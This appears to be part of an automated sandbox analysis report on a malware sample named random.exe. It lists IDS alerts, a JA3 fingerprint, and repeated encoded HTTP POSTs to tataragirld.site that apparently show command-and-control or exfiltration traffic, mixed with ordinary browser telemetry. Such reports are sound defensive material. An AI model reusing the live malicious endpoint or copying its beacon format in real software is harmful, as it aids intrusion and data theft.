Source: Joe Sandbox ViewIP Address: 18.238.49.52 18.238.49.52
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewIP Address: 23.219.161.135 23.219.161.135
Source: Joe Sandbox ViewIP Address: 20.110.205.119 20.110.205.119
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49899 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49905 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49911 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49919 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49927 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49936 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49942 -> 188.114.96.3:443
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15Content-Length: 147Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdUContent-Length: 53Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdUContent-Length: 208Host: tataragirld.site
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=035D89D9374366AE1C219CB0365A672A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943564645&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3869sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b2?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=035D89D9374366AE1C219CB0365A672A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1DBdcc8eac98d38a8586d401735943565; XID=1DBdcc8eac98d38a8586d401735943565
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735943564647&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5a52ed0c294f4f41b8f4e067b1be6fff&activityId=5a52ed0c294f4f41b8f4e067b1be6fff&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=168B4F4B4C3749C99CB580CDBEB608F0&MUID=035D89D9374366AE1C219CB0365A672A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943566682&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10987sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943566686&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 4841sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943567340&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5429sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943567716&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9842sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdUContent-Length: 106564Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdUContent-Length: 745Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdUContent-Length: 212Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdUContent-Length: 380Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdUContent-Length: 29729Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdUContent-Length: 100087Host: tataragirld.site
Source: global trafficHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdUContent-Length: 35Host: tataragirld.site
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.41
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.52
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.146
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=035D89D9374366AE1C219CB0365A672A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=035D89D9374366AE1C219CB0365A672A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1DBdcc8eac98d38a8586d401735943565; XID=1DBdcc8eac98d38a8586d401735943565
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735943564647&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5a52ed0c294f4f41b8f4e067b1be6fff&activityId=5a52ed0c294f4f41b8f4e067b1be6fff&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=168B4F4B4C3749C99CB580CDBEB608F0&MUID=035D89D9374366AE1C219CB0365A672A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1; SM=T
Source: random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: random.exe, 00000000.00000003.2168129632.000001D2E6CC4000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":"OptOut"},{"domain":"outbrainimg.com","applied_policy":"OptOut"},{"domain":"pexels.com","applied_policy":"OptOut"},{"domain":"search.naver.com","applied_policy":"OptOut"},{"domain":"search.yahoo.com","applied_policy":"OptOut"},{"domain":"sharepoint.com","applied_policy":"OptOut"},{"domain":"skovik.com","applied_policy":"OptOut"},{"domain":"staging-bing-int.*","applied_policy":"OptOut"},{"domain":"storage.live.com","applied_policy":"OptOut"},{"domain":"svc.ms","applied_policy":"OptOut"},{"domain":"sygic.*","applied_policy":"OptOut"},{"domain":"techcommunity.microsoft.com","applied_policy":"OptOut"},{"domain":"tiktok.com","applied_policy":"OptOut"},{"domain":"twitter.com","applied_policy":"OptOut"},{"domain":"web.whatsapp.com","applied_policy":"OptOut"},{"domain":"yammer.com","applied_policy":"OptOut"},{"domain":"youtube.com","applied_policy":"OptOut"},{"domain":"content.lego.com","applied_policy":"OptOut"},{"domain":"partner.lego.com","applied_policy":"OptOut"},{"domain":"shop.b2b.lego.com","applied_policy":"OptOut"},{"domain":"showroom.lego.com","applied_policy":"OptOut"},{"domain":"legacyhealth.org","applied_policy":"OptOut"}]},"content_filter_on_off_switch":{"version":1,"policies":[{"name":"ContentFilter"}],"applications":[{"domain":"microsoft.com","applied_policy":"ContentFilter"}]},"ecp_override":{"version":1,"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTex